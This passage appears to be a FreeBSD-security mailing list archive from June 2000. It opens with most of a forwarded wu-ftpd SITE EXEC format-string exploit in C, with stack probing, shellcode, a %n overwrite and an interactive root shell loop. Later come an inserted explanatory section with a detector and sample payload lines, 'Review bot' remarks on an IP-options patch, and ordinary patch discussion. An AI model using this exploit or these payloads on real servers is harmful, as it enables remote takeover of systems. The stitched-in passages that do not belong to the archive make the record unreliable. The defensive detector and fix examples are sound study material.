>  return ftp_recv(sock,ans,ans_size,0);
> return 0;
>}
>
>/* Send a "site exec" line and keep the "200-" reply in ans. */
>int ftp_siteexec(int sock,char*buff,int buff_len,int q,char*ans,int ans_len){
> ftp_send(sock,buff,buff_len,q,ans,ans_len);
> if(strncmp(ans,"200-",4)==0)
>  ftp_recv(sock,NULL,0,1);
> else
>  ftp_recv(sock,ans,ans_len,0);
>
> if(strncmp(ans,"200-",4)){
>  fprintf(stderr,"Cannot find site exec response string\n");
>  exit(1);
> }
> return 0;
>}
>
>void ftp_login(int sock,char*u_name,char*u_pass)
>{
> char buff[2048];
> printf("loggin into system..\n");
> snprintf(buff,2047,"USER %s\r\n", u_name);
> ftp_send(sock, buff,strlen(buff),1,buff,2047);
> printf(GREEN"USER %s\n"NORM"%s",u_name,buff);
> snprintf(buff,2047,"PASS %s\r\n",u_pass);
> printf(GREEN"PASS %s\n"NORM,*u_pass=='\x90'?"":u_pass);
> ftp_send(sock,buff,strlen(buff),1,buff,2047);
> while(strstr(buff,"230 ")==NULL){
>  (void)bzero(buff,2048);
>  ftp_recv(sock,buff,2048,0);
> }
> printf("%s",buff);
> return;
>}
>
>/* Non-anonymous mode: park the shellcode in a directory name on the server. */
>void ftp_mkchdir(int sock,char*cd,char*new)
>{
> char buff[2048];
>
> sprintf(buff,"CWD %s\r\n",cd);
> printf(GREEN"%s"NORM,buff);
> ftp_send(sock,buff,strlen(buff),1,buff,2047);
> printf("%s",buff);
> sprintf(buff,"MKD %s\r\n",new);
> ftp_send(sock,buff,strlen(buff),1,buff,2047);
> printf(GREEN"MKD "NORM"\n%s",buff);
> sprintf(buff,"CWD %s\r\n",new);
> ftp_send(sock,buff,strlen(buff),1,buff,2047);
> printf(GREEN"CWD "NORM"\n%s",buff);
> return;
>}
>void process_possibly_rooted(int sock)
>{
> fd_set fd_read;
> char buff[1024], *cmd=getit.islinux?"/bin/uname -a;/usr/bin/id;exit\n":"/usr/bin/uname -a;/usr/bin/id;exit\n";
> int n;
>
> FD_ZERO(&fd_read);
> FD_SET(sock, &fd_read);
> FD_SET(0, &fd_read);
> send(sock, cmd, strlen(cmd), 0);
> while(1) {
>  FD_SET(sock,&fd_read);
>  FD_SET(0,&fd_read);
>  if(select(sock+1,&fd_read,NULL,NULL,NULL)<0) break;
>  if( FD_ISSET(sock, &fd_read) ) {
>   if((n=recv(sock,buff,sizeof(buff),0))<0){
>    fprintf(stderr, "EOF\n");
>    exit(2);
>   }
>   if(write(1,buff,n)<0)break;
>  }
>  if ( FD_ISSET(0, &fd_read) ) {
>   if((n=read(0,buff,sizeof(buff)))<0){
>    fprintf(stderr,"EOF\n");
>    exit(2);
>   }
>   if(send(sock,buff,n,0)<0) break;
>  }
>  usleep(10);
> }
> fprintf(stderr,"Connection aborted, select failed()\n");
> exit(0);
>}
>
>/* Magic-string digging: append one conversion at a time and watch the
> * length of the echoed reply to learn how each stack slot is consumed. */
>int magic_check_f(int sock, char *str) {
> char q[2048], ans[2048];
>
> snprintf(q, 2048, "site exec %s%s\r\n", str, "%.f");
> if( strstr( q, "\r\n") == NULL) {
>  fprintf(stderr,"Line TOO big..\n");
>  exit(-1);
> }
> ftp_siteexec(sock, q, strlen(q), 1, ans, 2048);
> if( before_len+10 < strlen(&ans[3]) ) return 0;
> before_len=strlen(&ans[3]);
> (void)strcat(str,"%.f");
> return 1;
>}
>int magic_check_o(int sock, char *str) {
> char q[2048], ans[2048];
> snprintf(q, 2048, "site exec %s%s\r\n", str, "%c");
> if( strstr( q, "\r\n") == NULL) {
>  fprintf(stderr,"Line TOO big..\n");
>  exit(-1);
> }
> ftp_siteexec( sock, q, strlen(q), 1, ans, 2048);
> if( before_len== strlen(&ans[3]) ) {
>  before_len+=1;
>  (void)strcat(str, "%d");
>  return 3;
> }
> before_len=strlen(&ans[3]);
> (void)strcat(str,"%c");
> return 2;
>}
>
>/* Done when a %p in the format reads back the "aaaa" we put on the stack. */
>int magic_check_ok( int sock, char *str)
>{
> char q[2048], ans[2048];
> int i ,n=1, f, padding=0;
>
> snprintf(q, 2048,"site exec aaaaaaaa%s%s\r\n", str, "%p%p");
> if ( strstr(q, "\r\n" ) == NULL) {
>  fprintf(stderr, "Line too long\n");
>  exit(-1);
> }
> (void)bzero(ans, 2048);
> ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);
> if(strstr(ans,"0x61616161")==NULL)
>  return 0;
> for(i =0; i < MAX_MAGIC && magic[i]; i++);
> magic_d[i]=4;
> while(n){
>  for(f=0; f< 2; f++) {
>   snprintf(q, 2048,"site exec %.*saaaa%s%s\r\n", padding, "xxxx", str, f?"%p%p":"%p");
>   (void)bzero(ans, 2048);
>   ftp_siteexec(sock, q, strlen(q), 1, ans, 2047);
>   if( strstr(ans, "0x61616161")!=NULL) {
>    if (f==0) {
>     magic[i]=padding;
>     return 1;
>    } else if( f==1) {
>     strcat(str,"%p");
>     magic[i]=padding;
>     return 1;
>    }
>   }
>  }
>  if(padding > 4) {
>   fprintf(stderr,"Cannot calculate padding..\n");
>   exit(1);
>  }
>  padding++;
> }
> return 1;
>}
>
>
>int magic_digger(int sock)
>{
> int get_out=1,where=0,all_failed=MAX_FAILED*2,f=0,o=0;
>
> if(magic_str==NULL){
>  if((magic_str=(char*)malloc(4092))==NULL){
>   perror("malloc");
>   exit(errno);
>  }
> }
> (void)bzero(magic_str, 4092);
> where=0;
> while(get_out) {
>  int q;
>  if( where >= MAX_MAGIC-1 || all_failed <= 0 )
>   return -1;
>  if( magic_check_f(sock, magic_str) ) {
>   o=0,f++;
>   if(f==1){
>    if(!magic[where])
>     magic[where]=1;
>    else
>     magic[++where]+=1;
>    magic_d[where]=1;
>   } else
>    magic[where]+=1;
>   all_failed=MAX_FAILED*2;
>   printf("%s", "%.f"); fflush(stdout);
>   goto verify;
>  }
>  all_failed--;
>  if((q=magic_check_o(sock,magic_str))){
>   f=0,o++;
>   if(o==1){
>    if(!magic[where])
>     magic[0]=1;
>    else
>     magic[++where]+=1;
>    magic_d[where]=q;
>   } else {
>    if(magic_d[where]==q)
>     magic[where]+=1;
>    else {
>     magic[++where]=1;
>     magic_d[where]=q;
>    }
>   }
>   all_failed=MAX_FAILED*2;
>   printf("%s", q==2?"%c":"%d");
>   fflush(stdout);
>   goto verify;
>  }
>  all_failed--;
>  continue;
>  verify:
>  if(magic_check_ok(sock,magic_str)){
>   putchar('\n');
>   return 0;
>  }
> }
> return 0;
>}
>
>int main(int argc, char *argv[]){
> char *buff, *buff_p, *buff_p2, shellcode[500],*dir=NULL,*passwd=shellcode;
> int c;   /* int, not char: getopt() returns -1 at the end */
> int i, sock, num=-2, padding=-1, gm=0, testmode=0,mtype=0,bla=0,offset=0;
> u_long ret_addr=0, pass_addr=0;
> for(i=0;targ[i].os_descr!=NULL;i++);
> while((c=getopt(argc,argv,"t:l:m:o:s:r:p:M:P:xghH?"))!=EOF){
>  switch(c) {
>   case 't': target=optarg;break;
>   case 'l':
>    username=optarg;
>    passwd=strchr(optarg,'/');
>    if(passwd==NULL)
>     usage(argv[0],0);
>    *passwd++=(char)0;
>    break;
>   case 'x': testmode=1; break;
>   case 'o': offset=atoi(optarg);break;
>   case 'p': pass_addr=strtoul(optarg, &optarg,16); break;
>   case 'g': gm=1; break;
>   case 'M': dir=optarg;mtype=1;break;
>   case 'm':
>   {
>    int where=0;
>    if(!*optarg) {
>     fprintf(stderr,"-m requires argument, try -h for help\n");
>     exit(1);
>    }
>    while(1) {
>     magic[where]=strtoul(optarg,&optarg,16);
>     optarg=strchr(optarg,',');
>     if(optarg==NULL){
>      printf("comma missing\n");
>      exit(1);
>     }
>     optarg++;
>     magic_d[where++]=strtoul(optarg,&optarg,16);
>     if(strchr(optarg,':')==NULL){
>      magic[where]=magic_d[where]=0;
>      break;
>     }
>     optarg=strchr(optarg,':');
>     optarg++;
>    }
>   }
>   break;
>   case 's':/*
>    num=atoi(optarg);
>    if(num>i) {
>     fprintf(stderr,"systype too big, try -h for help\n");
>     exit(1);
>    } :) */
>   break;
>   case 'r':
>    ret_addr=strtoul(optarg,&optarg,16);
>    break;
>   case 'P':
>    padding=atoi(optarg);
>    break;
>   case 'H':
>    bla=2;
>   default: usage(argv[0],bla);break;
>  }
> }
> if(target==NULL){
>  fprintf(stderr,"No target specified, try -h for help\n");
>  exit(1);
> }
> if(num==-1||num==-2) {
>  for(i=0;!targ[i].def;i++);
>  num=i;
> }
> (void)memcpy((void*)&getit,(void*)&targ[num],sizeof(struct targets));
>
> if(magic[1]!=0) {
>  memcpy((void*)getit.magic,magic,sizeof(magic));
>  memcpy((void*)getit.magic_d,magic_d,sizeof(magic));
> }
>
> if(ret_addr)getit.addr_ret_addr=ret_addr;
> if(pass_addr)getit.pass_addr=pass_addr;
>
> getit.addr_ret_addr+=(offset*4);
>
> sock=connect_to_server(target);
> /* NOP sled followed by the shellcode; it travels in the PASS argument
>  * (anonymous) or in a directory name (-M). */
> memset(shellcode, '\x90', sizeof(shellcode));
> shellcode[sizeof(shellcode)-1]=(char)0;
> if(!mtype){
>  memcpy((void*)&shellcode[sizeof(shellcode)-strlen(getit.shellcode)-1],(void*)getit.shellcode, strlen(getit.shellcode)+1);
>  shellcode[sizeof(shellcode)-1]=(char)0;
> }else{
>  memcpy((void*)&shellcode[250-strlen(getit.shellcode)-1],(void*)getit.shellcode,strlen(getit.shellcode));
>  shellcode[250-1]=(char)0;
> }
> printf("Target: %s (%s/%s): %s\n",target,username,*passwd=='\x90'?"":passwd,getit.os_descr);
> printf("Return Address: 0x%08lx, AddrRetAddr: 0x%08lx, Shellcode: %d\n\n",getit.pass_addr,getit.addr_ret_addr,(int)strlen(getit.shellcode));
>
> buff=(char *)malloc(1024);
> bzero(buff,1024);
>
> (void)ftp_recv(sock,NULL,0,1);
>
> (void)ftp_login(sock,username,passwd);
>
> if(gm||(magic_str==NULL&&getit.magic[0]==0)){
>  printf("STEP 2A: Generating magic string: ");
>  fflush(stdout);
>  magic_digger(sock);
>  memcpy((void *)getit.magic,(void*)magic,sizeof(magic));
>  memcpy((void*)getit.magic_d,(void*)magic_d,sizeof(magic_d));
>  printf("STEP 2B: MAGIC STRING: [");
> } else {
>  printf("STEP 2 : Skipping, magic number already exists: [");
> }
> /* Loop headers and bodies from here on were restored: the archive dropped
>  * everything between '<' and the next '>'.  magic_d 1/2/3 expand to
>  * "%.f"/"%c"/"%d" as magic_check_f() and magic_check_o() encode them. */
> for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){
>  printf("%02X,%02X",getit.magic[i],getit.magic_d[i]);
>  if(getit.magic[i+1]!=0)
>   putchar(':');
> }
> printf("]\n");
> buff=(char *)realloc(buff, 4096);   /* was 4092; the snprintf below writes up to 4096 */
> (void)bzero(buff, 4096);
> if(mtype)
>  ftp_mkchdir(sock,dir,shellcode);
> printf("STEP 3 : Checking if we can reach our return address by format string\n");
> if(!magic_str){
>  magic_str=(char*)malloc(2048);
>  if(magic_str==NULL) {
>   perror("malloc");
>   exit(errno);
>  }
>  (void)bzero(magic_str,2048);
>  for(i=0;i<MAX_MAGIC&&getit.magic[i]!=0;i++){
>   switch(getit.magic_d[i]) {
>    case 1:
>     for(num=0;num<getit.magic[i];num++)strcat(magic_str,"%.f");
>     break;
>    case 2:
>     for(num=0;num<getit.magic[i];num++)strcat(magic_str,"%c");
>     break;
>    case 3:
>     for(num=0;num<getit.magic[i];num++)strcat(magic_str,"%d");
>     break;
>    case 4:if(padding<0)padding=getit.magic[i];break;
>    default:fprintf(stderr,"STEP 3: INternal error\n");
>     exit(1);
>     break;
>   }
>  }
> }
> if(padding<0){
>  for(num=0;num<MAX_MAGIC&&getit.magic_d[num]!=4;num++);
>  if(num<(MAX_MAGIC-1))
>   padding=getit.magic[num];
>  else
>   fprintf(stderr,"WARNING: PROBLEMS WITH PADDING\n");
> }
>
> /* Format line: padding, the 4 address bytes, the magic string, then "|%p"
>  * so the reply shows which address the last conversion lands on. */
> if(!getit.islinux){
>  if(!testmode)
>   snprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%p");
>  else
>   snprintf(buff,4096,"site exec %.*s%c%c%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%p");
> } else {
>  if(!testmode)
>   snprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.addr_ret_addr),magic_str,"%p");
>  else
>   snprintf(buff,4096,"site exec %.*s%c%c\xff%c%c%s|%s\r\n",padding,"xxxxxxxxxxxxxxxxxxx",MAKE_STR_FROM_RET(getit.pass_addr),magic_str,"%p");
> }
> sleep(getit.delay);
> fflush(stdout);
> if((buff_p=(char *)malloc(4096))==NULL){
>  fprintf(stderr,"malloc failed.\n");
>  exit(1);
> }
> (void)bzero(buff_p,4096);
> ftp_siteexec(sock,buff,strlen(buff),1,buff_p,4095);
> if((buff_p2=strchr(buff_p,'\r'))!=NULL)
>  *buff_p2=(char)0;
> if((buff_p2=strchr(buff_p,'\n'))!=NULL)
>  *buff_p2=(char)0;
> buff_p2=strstr(buff_p,"|0x");
> if(buff_p2==NULL){
>  fprintf(stderr,"Fix me, incorrect response from '%%p':%s\n",buff_p);
>  exit(1);
> }
> buff_p2+=3;
> if(!testmode)
>  printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.addr_ret_addr);
> else
>  printf("STEP 4 : Ptr address test: 0x%s (if it is not 0x%08lx ^C me now)\n",buff_p2,getit.pass_addr);
> sleep(getit.delay);
> /* Swap the first "%.f" for "%d%.<pass_addr>d" so the byte count written by
>  * the trailing %n equals the shellcode address (test mode uses %s instead). */
> buff_p2=strstr(buff, "%.f");
> *buff_p2++=(char )0;
> strcpy(buff_p, buff);
> if(!testmode)
>  sprintf(buff_p+strlen(buff_p),"%s%u%c","%d%.",(u_int)getit.pass_addr,'d');
> else
>  sprintf(buff_p+strlen(buff_p),"%s","%d%d");
> strcpy(buff_p+strlen(buff_p), buff_p2);
> buff_p2=strchr(buff_p,'|');
> buff_p2++;
> printf("STEP 5 : Sending code.. this will take about 10 seconds.\n");
> if(!testmode){
>  strcpy(buff_p2,"%n\r\n");
>  ftp_send(sock,buff_p,strlen(buff_p),0,NULL,0);
> } else {
>  (void)bzero(buff,4096);
>  strcpy(buff_p2,"%s\r\n");
>  ftp_send(sock,buff_p,strlen(buff_p),1,buff,4092);
>  printf("got answer: %s\n",buff);
>  exit(0);
> }
> free(buff_p);
> free(buff);
> signal(SIGINT, SIG_IGN);
> signal(SIGHUP, SIG_IGN);
> printf(RED"Press ^\\ to leave shell"NORM"\n");
> process_possibly_rooted(sock);
> return 0;
>}

--------------------------------------------------------------------
Mike Tancsa, tel +1 519 651 3400
Network Administration, mike@sentex.net
Sentex Communications www.sentex.net
Cambridge, Ontario Canada www.sentex.net/mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Thu Jun 22 19:12:35 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mail-relay.eunet.no (mail-relay.eunet.no [193.71.71.242]) by
hub.freebsd.org (Postfix) with ESMTP id 2696D37B59E for ; Thu, 22 Jun 2000 19:12:31 -0700 (PDT) (envelope-from mbendiks@eunet.no) Received: from login-1.eunet.no (login-1.eunet.no [193.75.110.2]) by mail-relay.eunet.no (8.9.3/8.9.3/GN) with ESMTP id EAA57962; Fri, 23 Jun 2000 04:12:29 +0200 (CEST) (envelope-from mbendiks@eunet.no) Received: from localhost (mbendiks@localhost) by login-1.eunet.no (8.9.3/8.8.8) with ESMTP id EAA82637; Fri, 23 Jun 2000 04:12:29 +0200 (CEST) (envelope-from mbendiks@eunet.no) X-Authentication-Warning: login-1.eunet.no: mbendiks owned process doing -bs Date: Fri, 23 Jun 2000 04:12:29 +0200 (CEST) 
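As an added example that is not part of tf8's exploit, of wu-ftpd, or of Mike's forward: the pattern the wuftpd2600.c code above abuses is text typed after SITE EXEC reaching a variadic reply routine (wu-ftpd's lreply()) as the format argument. Below is that pattern beside the one-line fix, plus a control-channel check that flags the lines such an exploit has to send (the %.f/%c/%d/%p magic-string digging and the final %n write). lreply_model(), reply_vulnerable(), reply_fixed(), site_exec_looks_hostile(), count_hostile() and the session lines are this example's own; the session is constructed, not captured.

```c
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for a variadic reply helper such as wu-ftpd's lreply(): whatever
 * arrives as fmt is interpreted by vsnprintf. */
static int lreply_model(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return n;
}

/* Vulnerable shape: the SITE EXEC argument is the format.  With no matching
 * arguments this is undefined behaviour, which is what %p (stack read) and
 * %n (write) exploit.  Only ever call it with input that has no '%'. */
static int reply_vulnerable(char *out, size_t outsz, const char *user_arg)
{
    return lreply_model(out, outsz, user_arg);          /* BUG */
}

/* Fixed shape: the user text is only ever a %s argument. */
static int reply_fixed(char *out, size_t outsz, const char *user_arg)
{
    return lreply_model(out, outsz, "%s", user_arg);
}

/* Returns 1 if a control-channel line is a SITE EXEC whose argument carries a
 * printf conversion (%p, %c, %d, %.f, %n, ...) or a raw non-printable byte
 * (address bytes or a NOP sled), 0 otherwise.  "%%" is a literal percent. */
static int site_exec_looks_hostile(const char *line)
{
    static const char kw[] = "site exec";
    const char *p = line;
    size_t i;

    for (i = 0; kw[i] != '\0'; i++)
        if (p[i] == '\0' || tolower((unsigned char)p[i]) != kw[i])
            return 0;                              /* not a SITE EXEC command */
    for (p += i; *p != '\0' && *p != '\r' && *p != '\n'; p++) {
        unsigned char c = (unsigned char)*p;
        if (c == '%') {
            const char *q = p + 1;
            if (*q == '%') { p++; continue; }      /* escaped percent sign */
            while (*q != '\0' && strchr("-+ #0123456789.*", *q) != NULL)
                q++;                               /* flags, width, precision */
            if (*q != '\0' && strchr("diouxXeEfgGcspn", *q) != NULL)
                return 1;
        } else if (!isprint(c) && c != '\t') {
            return 1;
        }
    }
    return 0;
}

/* Number of hostile lines in a batch of control-channel lines. */
static int count_hostile(const char *const *lines, size_t n)
{
    int hits = 0;
    for (size_t i = 0; i < n; i++)
        hits += site_exec_looks_hostile(lines[i]);
    return hits;
}

/* Constructed session, not a real capture.  Lines 3 and 4 have the shape of
 * the exploit's magic-string probe and of its final "%d%.<addr>d...|%n" write. */
static const char *const sample_session[] = {
    "USER ftp\r\n",
    "SITE EXEC ls -la\r\n",
    "site exec aaaaaaaa%.f%.f%c%d%p%p\r\n",
    "site exec xx\x74\xb4\x06\x08%.f%.f%c%d%d%.3221225472d|%n\r\n",
    "SITE EXEC 100%% done\r\n",
};
#define SAMPLE_N (sizeof sample_session / sizeof sample_session[0])

int main(void)
{
    char buf[32];
    reply_fixed(buf, sizeof buf, "%p%p");
    printf("fixed reply echoes the text literally: %s\n", buf);
    reply_vulnerable(buf, sizeof buf, "ls -la");
    printf("vulnerable reply with harmless input:  %s\n", buf);
    printf("hostile lines in sample session: %d of %zu\n",
           count_hostile(sample_session, SAMPLE_N), SAMPLE_N);
    return 0;
}
```

The check is deliberately narrow: it does not try to decide whether a `%` sequence is dangerous, because on a vulnerable server every conversion is, and the exploit's first probes (`%.f`, `%c`, `%p`) look harmless on their own. Flagging any conversion, or any byte that cannot have come from a keyboard, in a SITE EXEC argument is the signal; the fix on the server side is the `"%s"` in reply_fixed().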
From: Marius Bendiksen To: Bruce Evans Cc: security@FreeBSD.ORG Subject: Re: msdosfs_vnops.c : msdosfs_rename() In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > It is supposed to be locked by setting IN_RENAME in ip->i_flag. Note that > IN_RENAME is only set in the doingdirectory case. According to the comments, nothing is locked at all. > I don't completely trust relookup(), however. In theory, the filesystem > tree may be almost arbitrarily rearranged while relookup() sleeps, since > relookup() doesn't hold many locks (in particular, it doesn't hold locks > on the directories being changed or their parents or grandparents until > it searches back down to them). I once made this happen in practice by > forcing some long sleeps and doing the rearrangement in another process. > There seemed to be problems, but I wasn't sure and have forgotten the > details. This is what I am talking about. It is, from what I see, possible to cause a problem by rearranging the directory (specifically, removing the source name) during a relookup. This would then cause a panic. Marius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 19:16:48 2000 Delivered-To: freebsd-security@freebsd.org Received: from web216.mail.yahoo.com (web216.mail.yahoo.com [128.11.68.116]) by hub.freebsd.org (Postfix) with SMTP id 06F0937B572 for ; Thu, 22 Jun 2000 19:16:44 -0700 (PDT) (envelope-from hho321@yahoo.com) Received: (qmail 14535 invoked by uid 60001); 23 Jun 2000 02:16:43 -0000 Message-ID: <20000623021643.14531.qmail@web216.mail.yahoo.com> Received: from [207.172.11.148] by web216.mail.yahoo.com; Thu, 22 Jun 2000 19:16:43 PDT Date: Thu, 22 Jun 2000 19:16:43 -0700 (PDT) 
From: Hugh Ho Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options To: Todd Backman Cc: security@FreeBSD.ORG MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I got the same error, but I managed to modify the source files manually by reading the patch. -Hugh --- Todd Backman wrote: > > So, upon following the instructions for patch on the SA (including DL'ing > the patch from the ftp site) I get the following: > > **** START **** > > stuff# patch -p < ip-options.diff > Hmm... Looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_icmp.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > |retrieving revision 1.39 > |diff -u -r1.39 ip_icmp.c > |--- ip_icmp.c 2000/01/28 06:13:09 1.39 > |+++ ip_icmp.c 2000/06/08 15:26:39 > -------------------------- > Patching file ip_icmp.c using Plan A... > Hunk #1 failed at 662. > 1 out of 1 hunks failed--saving rejects to ip_icmp.c.rej > Hmm... The next patch looks like a unified diff to me... > The text leading up to this was: > -------------------------- > |Index: ip_input.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_input.c,v > |retrieving revision 1.130 > |diff -u -r1.130 ip_input.c > |--- ip_input.c 2000/02/23 20:11:57 1.130 > |+++ ip_input.c 2000/06/08 15:25:46 > -------------------------- > Patching file ip_input.c using Plan A... > Hunk #1 failed at 1067. > Hunk #2 failed at 1178. > 2 out of 2 hunks failed--saving rejects to ip_input.c.rej > Hmm... The next patch looks like a unified diff to me... 
> The text leading up to this was: > -------------------------- > |Index: ip_output.c > |=================================================================== > |RCS file: /ncvs/src/sys/netinet/ip_output.c,v > |retrieving revision 1.99 > |diff -u -r1.99 ip_output.c > |--- ip_output.c 2000/03/09 14:57:15 1.99 > |+++ ip_output.c 2000/06/08 15:27:08 > -------------------------- > Patching file ip_output.c using Plan A... > Hunk #1 failed at 1302. > 1 out of 1 hunks failed--saving rejects to ip_output.c.rej > done > > **** FINISH **** > > Can anyone hit me with the cluestick? > > Thanks. > > - Todd > > > On Thu, 22 Jun 2000, FreeBSD Security Advisories wrote: > > > # cd /usr/src/sys/netinet > > # patch -p < /path/to/patch_or_advisory > > > > Index: ip_icmp.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_icmp.c,v > > retrieving revision 1.39 > > diff -u -r1.39 ip_icmp.c > > --- ip_icmp.c 2000/01/28 06:13:09 1.39 > > +++ ip_icmp.c 2000/06/08 15:26:39 > > @@ -662,8 +662,11 @@ > > if (opt == IPOPT_NOP) > > len = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + break; > > len = cp[IPOPT_OLEN]; > > - if (len <= 0 || len > cnt) > > + if (len < IPOPT_OLEN + sizeof(*cp) || > > + len > cnt) > > break; > > } > > /* > > Index: ip_input.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_input.c,v > > retrieving revision 1.130 > > diff -u -r1.130 ip_input.c > > --- ip_input.c 2000/02/23 20:11:57 1.130 > > +++ ip_input.c 2000/06/08 15:25:46 > > @@ -1067,8 +1067,12 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) { > > + code = &cp[IPOPT_OLEN] - (u_char *)ip; > > + goto bad; > > + } > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= 0 || optlen > cnt) { > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) { > > code = &cp[IPOPT_OLEN] - (u_char *)ip; > > goto bad; > > } 
> > @@ -1174,6 +1178,10 @@ > > break; > > > > case IPOPT_RR: > > + if (optlen < IPOPT_OFFSET + sizeof(*cp)) { > > + code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > + goto bad; > > + } > > if ((off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF) { > > code = &cp[IPOPT_OFFSET] - (u_char *)ip; > > goto bad; > > Index: ip_output.c > > =================================================================== > > RCS file: /ncvs/src/sys/netinet/ip_output.c,v > > retrieving revision 1.99 > > diff -u -r1.99 ip_output.c > > --- ip_output.c 2000/03/09 14:57:15 1.99 > > +++ ip_output.c 2000/06/08 15:27:08 > > @@ -1302,8 +1302,10 @@ > > if (opt == IPOPT_NOP) > > optlen = 1; > > else { > > + if (cnt < IPOPT_OLEN + sizeof(*cp)) > > + goto bad; > > optlen = cp[IPOPT_OLEN]; > > - if (optlen <= IPOPT_OLEN || optlen > cnt) > > + if (optlen < IPOPT_OLEN + sizeof(*cp) || optlen > cnt) > > goto bad; > > } > > switch (opt) { > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message __________________________________________________ Do You Yahoo!? Get Yahoo! Mail - Free email you can access from anywhere! http://mail.yahoo.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 19:28:34 2000 Delivered-To: freebsd-security@freebsd.org Received: from server1.mich.com (server1.mich.com [198.108.16.2]) by hub.freebsd.org (Postfix) with ESMTP id D0FC537B523 for ; Thu, 22 Jun 2000 19:28:30 -0700 (PDT) (envelope-from will@almanac.yi.org) Received: from argon.gryphonsoft.com (pm014-041.dialup.bignet.net [64.79.82.153]) by server1.mich.com (8.9.3/8.9.3) with ESMTP id WAA32661; Thu, 22 Jun 2000 22:28:20 -0400 Received: by argon.gryphonsoft.com (Postfix, from userid 1000) id DF82C195F; Thu, 22 Jun 2000 22:26:33 -0400 (EDT) Date: Thu, 22 Jun 2000 22:26:33 -0400 
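Review bot: in the second ip_input.c hunk, the new guard only checks that the offset byte exists (optlen >= IPOPT_OFFSET + 1) before `off = cp[IPOPT_OFFSET]` in the IPOPT_RR case; the other option cases that read cp[IPOPT_OFFSET] are not in the diff, so the submitter should state whether they are already safe after the first hunk's optlen >= 2 test or need the same guard. The hunk also repeats `code = &cp[IPOPT_OFFSET] - (u_char *)ip; goto bad;` directly above the identical body of the existing `off < IPOPT_MINOFF` test; folding the length check into that condition (`optlen < IPOPT_OFFSET + sizeof(*cp) || (off = cp[IPOPT_OFFSET]) < IPOPT_MINOFF`) would avoid the duplicate.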
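Review bot: in the ip_output.c hunk, the old test `optlen <= IPOPT_OLEN` already rejected a length of 0 or 1, so the only behavioural change here is the new `cnt < IPOPT_OLEN + sizeof(*cp)` test, which stops cp[IPOPT_OLEN] being read when a non-NOP option type is the last byte of the option area; that deserves a comment, and the rewritten length test should be described as aligning this file with the ip_input.c form rather than as a second fix, so nobody later "restores" the shorter condition.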
From: Will Andrews To: Todd Backman Cc: security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory: FreeBSD-SA-00:23.ip-options Message-ID: <20000622222633.C67587@argon.gryphonsoft.com> References: <20000622215052.D642E37BF12@hub.freebsd.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0.1i In-Reply-To: ; from todd@flyingcroc.net on Thu, Jun 22, 2000 at 05:01:06PM -0700 X-Operating-System: FreeBSD 5.0-CURRENT i386 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Jun 22, 2000 at 05:01:06PM -0700, Todd Backman wrote: > Can anyone hit me with the cluestick? Sure. Try having an up-to-date FreeBSD source tree. :-) In that case you won't even need the patches. :-) -- Will Andrews GCS/E/S @d- s+:+>+:- a--->+++ C++ UB++++ P+ L- E--- W+++ !N !o ?K w--- ?O M+ V-- PS+ PE++ Y+ PGP+>+++ t++ 5 X++ R+ tv+ b++>++++ DI+++ D+ G++>+++ e->++++ h! r-->+++ y? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 22 20:34:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from silby.com (cb34181-a.mdsn1.wi.home.com [24.14.173.39]) by hub.freebsd.org (Postfix) with SMTP id 0F39B37B5AF for ; Thu, 22 Jun 2000 20:34:31 -0700 (PDT) (envelope-from silby@silby.com) Received: (qmail 65812 invoked by uid 1000); 23 Jun 2000 03:34:30 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 23 Jun 2000 03:34:30 -0000 Date: Thu, 22 Jun 2000 22:34:30 -0500 (CDT) 
